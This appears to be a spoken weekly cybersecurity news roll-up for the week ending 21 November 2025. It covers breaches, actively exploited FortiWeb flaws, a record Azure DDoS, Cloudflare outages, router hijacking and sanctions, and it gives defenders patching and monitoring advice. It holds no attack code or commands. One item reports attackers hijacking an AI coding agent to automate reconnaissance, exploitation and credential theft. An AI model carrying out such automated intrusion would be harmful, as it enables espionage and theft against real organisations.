Weekly Update: Cyber News for the Week ending 21 November, 2025
This is your weekly cyber news roll-up for the week ending November 21st, 2025.
You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news.
Jaguar Land Rover is still absorbing the shock from a cyberattack that forced factory shutdowns for almost six weeks. Production lines went quiet across plants, starving the supply chain and helping to drive seven hundred fifty million dollars in quarterly losses. The financial hit was very severe. Direct response work, including forensics and emergency technology fixes, added an estimated two hundred million dollars in cost on top of the lost output. Suppliers, workers, and even the United Kingdom government were pulled into the crisis as loan guarantees and cash flow support became necessary, showing how one digital intrusion can turn into a lingering business emergency for highly automated manufacturers.
Attackers linked to a suspected China aligned group abused an artificial intelligence coding agent to run a full espionage campaign. The hijacked tool automated reconnaissance, vulnerability discovery, exploitation steps, credential theft, and even analysis of stolen data across about thirty high value targets in finance, chemicals, technology, and government. That automation let a small human team move quickly. Organizations with valuable intellectual property and complex cloud footprints are most exposed this week, especially where automated, script like probing from cloud infrastructure is not closely watched. For now, the provider has shut down malicious accounts and shared indicators, but defenders need new hunting rules for agent driven intrusions and logging that can keep up with much faster, machine assisted attack chains.
North Korean operators are leaning deeper into the software supply chain by hiding malware inside developer tools and projects that appear legitimate at first glance. Their tactic is to trojanize code or utilities that developers might download, then quietly pull follow on payloads from text based storage services once the project runs in a trusted environment. The initial package looks harmless to many filters. Teams that rely on open source tools or shared snippets without rigorous validation are most affected, because compromised code can end up in build systems and production workloads. As this campaign continues, leaders and defenders are under pressure to improve dependency management, code signing, and build isolation, and to watch for unusual outbound connections or new processes on developer and build servers that point to poisoned projects.
In Pennsylvania, the state attorney general’s office has confirmed that an August cyberattack led to the theft of files containing personal and medical information. Stolen data ties to legal matters and health records about people who interacted with the office, making each record unusually sensitive. Public trust is at stake here. Healthcare providers, insurers, and government partners may now see increased fraud attempts, extortion, or pressure campaigns based on stolen details about medical conditions and legal issues. This week the office is reviewing how case management and storage systems handle regulated data, notifying affected individuals, and working with security teams to segment high risk repositories and tighten access and monitoring.
Fortinet’s FortiWeb web application firewalls are also under active attack from a critical vulnerability that allows unauthenticated attackers to run commands and gain administrator level control. By sending crafted requests to internet facing instances, intruders can effectively take over management of front end protections for business critical sites and services. Older or unpatched versions are at greatest risk. For organizations that depend on these appliances as their primary shield, this week is a warning that perimeter tools need aggressive patching, restricted management exposure, and regular configuration review. Researchers are already seeing real world exploitation, so defenders should inventory every deployment, lock down management access, and comb logs for configuration changes or unexpected outbound traffic from the devices.
Microsoft reports that its Azure cloud recently absorbed a record breaking distributed denial of service attack that peaked at fifteen point seven terabits per second. The assault used a botnet called Aisuru built from more than half a million compromised internet connected devices, hammering both bandwidth and application layers for targeted services. Those numbers are genuinely staggering today. Even when the platform successfully soaks up the traffic, customers can still face degraded performance, noisy alerts, and unexpected cost spikes from autoscaling and protective measures. Organizations that rely heavily on Azure hosted services or public facing application programming interfaces should treat this week as a prompt to revisit availability objectives, tune protections, and rehearse communications for future large scale floods.
Cloudflare triggered a brief but wide reaching outage when a misconfigured update overloaded parts of its global network and caused many sites to fail. Users who tried to reach popular social platforms, collaboration tools, and retailers instead saw timeouts or gateway error pages in their browsers. The disruption came from an internal mistake. Engineers began rolling back the configuration within hours, and most customers regained service the same day, though some saw lingering instability during traffic rebalancing. For organizations that front critical portals, payment flows, or application programming interfaces through a single edge provider, this outage is a reminder to treat external platforms as potential single points of failure and to design failover and monitoring plans accordingly.
Fortinet has now shipped a security update for FortiWeb to address a web application firewall vulnerability that attackers are already targeting in the wild. The issue allows remote code execution on exposed appliances, giving an intruder control over a device that often sits directly in front of critical applications and customer portals. Adoption of the fix appears uneven so far. Security researchers and vendors are seeing ongoing opportunistic scanning for unpatched FortiWeb systems, which can allow attackers to alter traffic inspection, plant backdoors, or pivot deeper into network segments behind the firewall. This week leaders and defenders need to identify every deployment, confirm versions against vendor guidance, and review logs for signs of probing or unusual administrative access before and after patching.
A long running campaign dubbed Operation WrtHug has quietly taken over tens of thousands of old ASUS home and small office routers. Attackers chained several known firmware flaws to gain persistent control of these end of life devices, many of which sit at the edge of small businesses and remote workers. The scale of the hijack is striking. Most of the affected hardware appears to be in Asia and Europe, with measurable exposure in North America, and many owners have no patch path or even awareness that their routers now sit inside an attacker controlled network. For organizations that depend on home and branch connectivity for remote access, this week underscores the need to require supported routers, block known bad router address ranges, and mine firewall and virtual private network logs for unusual activity coming from employee locations.
Cloudflare’s most disruptive outage in six years has sparked broader questions about how much of the internet now hinges on a few key providers. A routine configuration change in its bot protection systems produced an oversized data file that overloaded critical components and cascaded into widespread failures for websites, internal tools, and third party services. Many customers saw multiple independent services fail at once. Recovery took several hours, and even after core traffic returned, some control plane features and client tools stayed degraded, leaving incident responders with reduced visibility when they most needed it. This week the outage is prompting leaders and defenders to revisit dependency maps, design manual fallbacks, and ensure that key monitoring and communication channels do not all run through the same cloud paths that can fail together.
The United States, United Kingdom, and Australia have jointly announced sanctions on a Russian hosting company accused of providing bulletproof infrastructure to major ransomware gangs. Authorities say the firm and its affiliates ignored abuse reports and helped attackers keep servers online during earlier investigations and takedowns, effectively acting as an enabler for repeated attacks on hospitals, schools, and private industry. These sanctions raise the legal stakes for banks. For security and compliance teams, this week’s action signals that governments are willing to treat enabling infrastructure providers as direct participants in cybercrime rather than neutral carriers. Organizations should expect more scrutiny of how they vet hosting, cloud, and payment partners tied to high risk regions, and defenders can use sanctions data to sharpen blocklists and detection focus on newly flagged networks and address ranges.
Another FortiWeb issue in the spotlight this week is a critical new vulnerability that is already under active attack against internet facing devices. The flaw allows unauthenticated attackers to abuse path traversal tricks and reach full administrative control, turning a web application firewall into a powerful foothold. Security telemetry shows opportunistic scanning rather than isolated probes. The United States Cybersecurity and Infrastructure Security Agency, C I S A, has added the bug to its known exploited vulnerability catalog and ordered federal agencies to patch within seven days, underscoring how urgent this patch cycle is. Enterprises that rely on FortiWeb to front high value portals and application programming interfaces should move quickly to identify every instance, apply fixes, and review logs for suspicious administrative actions or configuration changes that may signal deeper compromise.
Iran aligned hackers have demonstrated what researchers call cyber enabled kinetic targeting by using digital surveillance of a commercial ship to guide a real world missile strike that ultimately failed. They pulled detailed location information from the vessel’s automatic identification system, A I S, and combined it with access to onboard cameras to track crew movements and position in near real time. Ordinary safety and navigation tools became targeting aids. The campaign appears to be part of a broader pattern in which military or proxy groups quietly map maritime traffic and collect intelligence on high value ships operating in contested regions. Shipping lines and energy firms now need cyber and physical security teams working from one playbook, hardening gateways, satellite modems, and cameras, and monitoring for unusual access and traffic spikes around vessels at risk.
A China linked group has spent three years running a spying campaign built around a custom malware family known as BadAudio. The malware often hides behind seemingly harmless files or installers, acting as a stealthy first stage downloader that establishes a foothold and then pulls in additional payloads to support credential theft, lateral movement, and data exfiltration. Targets include agencies and telecom and technology firms. Despite evolving delivery methods that range from spear phishing to tampered software packages, the campaign’s core goal remains long term, low noise access to sensitive networks. For national infrastructure operators and large enterprises, this week’s analysis reinforces the need for controls on software installation, strict allow lists for update sources, and expanded threat hunting focused on stealthy command and control traffic from newly installed or rarely used applications.
Fortinet has also warned customers about a command injection flaw in FortiWeb that attackers are actively exploiting through the management interface. The bug allows anyone with access to that interface to run system level commands on the appliance, and researchers note that it can be combined with a separate path traversal issue to reach effective full control. These positions make the devices prime targets. The vulnerability affects multiple software versions, and Fortinet has released patches and interim mitigations while official exploited vulnerability lists now include the issue. Organizations that rely on FortiWeb to protect customer facing sites should move quickly to patch, lock down internet reachable management access, and review recent logs for unexpected administrator logins or scripted sequences of configuration changes and command outputs.
Salesforce is investigating unusual activity involving customer managed apps from Gainsight that may have exposed some Salesforce customer data through high privilege integrations. These connections often carry very broad privileges. The incident centers on integration flows that use token based connections, where Gainsight published applications connect into environments with wide permission to read and write sensitive records. As a precaution, Salesforce has revoked existing access tokens for those apps while working with Gainsight to understand what was accessed and by whom. This week companies that treat Salesforce as a customer data hub should inventory all connected applications, review permissions and logs for unusual queries or exports tied to Gainsight related apps, and tighten token rotation and alerting on high volume data pulls.
That’s the BareMetalCyber Weekly Roll-Up for the week ending November 21st, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber news dot com. We’ll be back next week.
